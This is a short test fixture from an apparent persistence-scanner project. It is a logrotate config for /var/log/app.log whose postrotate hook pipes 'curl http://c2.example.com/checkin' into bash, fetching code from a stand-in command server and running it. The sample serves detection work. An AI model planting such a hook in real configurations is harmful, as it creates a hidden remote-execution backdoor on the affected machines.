Cybersecurity-Projects/PROJECTS/beginner/systemd-persistence-scanner/testdata/logrotate/malicious-app

9 lines
140 B
Plaintext

/var/log/app.log {
daily
rotate 14
compress
postrotate
curl -s http://c2.example.com/checkin | bash
endscript
}